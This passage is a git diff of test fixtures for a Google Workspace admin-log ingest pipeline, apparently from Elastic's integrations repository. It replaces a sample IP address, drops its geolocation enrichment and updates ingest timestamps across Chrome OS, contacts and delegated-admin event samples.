"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_CHROME_OS_PRINTER\",\"parameters\":[{\"name\":\"PRINTER_NAME\",\"value\":\"printer\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_CHROME_OS_PRINTER", "id": "1", @@ -1154,7 +902,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1176,35 +924,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974656200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668107800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_SETTING", "id": "1", @@ -1235,7 +965,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1257,35 +987,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974660300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668113500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"CHANGE_CHROME_OS_USER_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHROME_OS_USER_SETTING", "id": "1", @@ -1316,7 +1028,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1343,35 +1055,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974665100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668136600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"ISSUE_DEVICE_COMMAND\",\"parameters\":[{\"name\":\"DEVICE_COMMAND_DETAILS\",\"multiValue\":[\"command\",\"-a\"]},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "ISSUE_DEVICE_COMMAND", "id": "1", @@ -1401,7 +1095,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1423,35 +1117,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974669500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668142200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"MOVE_DEVICE_TO_ORG_UNIT_DETAILED\",\"parameters\":[{\"name\":\"DEVICE_NEW_ORG_UNIT\",\"value\":\"new\"},{\"name\":\"DEVICE_PREVIOUS_ORG_UNIT\",\"value\":\"prev\"},{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "MOVE_DEVICE_TO_ORG_UNIT_DETAILED", "id": "1", @@ -1481,7 +1157,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1505,35 +1181,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974673700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", + "ingested": "2021-12-09T13:38:27.668147400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"REMOVE_CHROME_OS_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "REMOVE_CHROME_OS_APPLICATION_SETTINGS", "id": "1", @@ -1563,7 +1221,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1587,35 +1245,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974677700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", + "ingested": "2021-12-09T13:38:27.668152700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHROME_OS_SETTINGS\",\"name\":\"UPDATE_DEVICE\",\"parameters\":[{\"name\":\"DEVICE_SERIAL_NUMBER\",\"value\":\"1234\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}", "provider": "admin", "action": "UPDATE_DEVICE", "id": "1", @@ -1645,7 +1285,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1669,35 +1309,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:18.974682200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:27.668158Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log index 5aececc68aa..40ae2ee7166 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log @@ -1 +1 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"CONTACTS_SETTINGS","name":"CHANGE_CONTACTS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json index 2f7aadc0b53..5231f1f2614 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-contacts.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.646302100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:30.339486Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CONTACTS_SETTINGS\",\"name\":\"CHANGE_CONTACTS_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CONTACTS_SETTING", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log index da76df3f767..9de35080e1c 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log @@ -1,8 +1,8 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json index 5bdc8a1bb5a..eeb8e6f93f2 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - 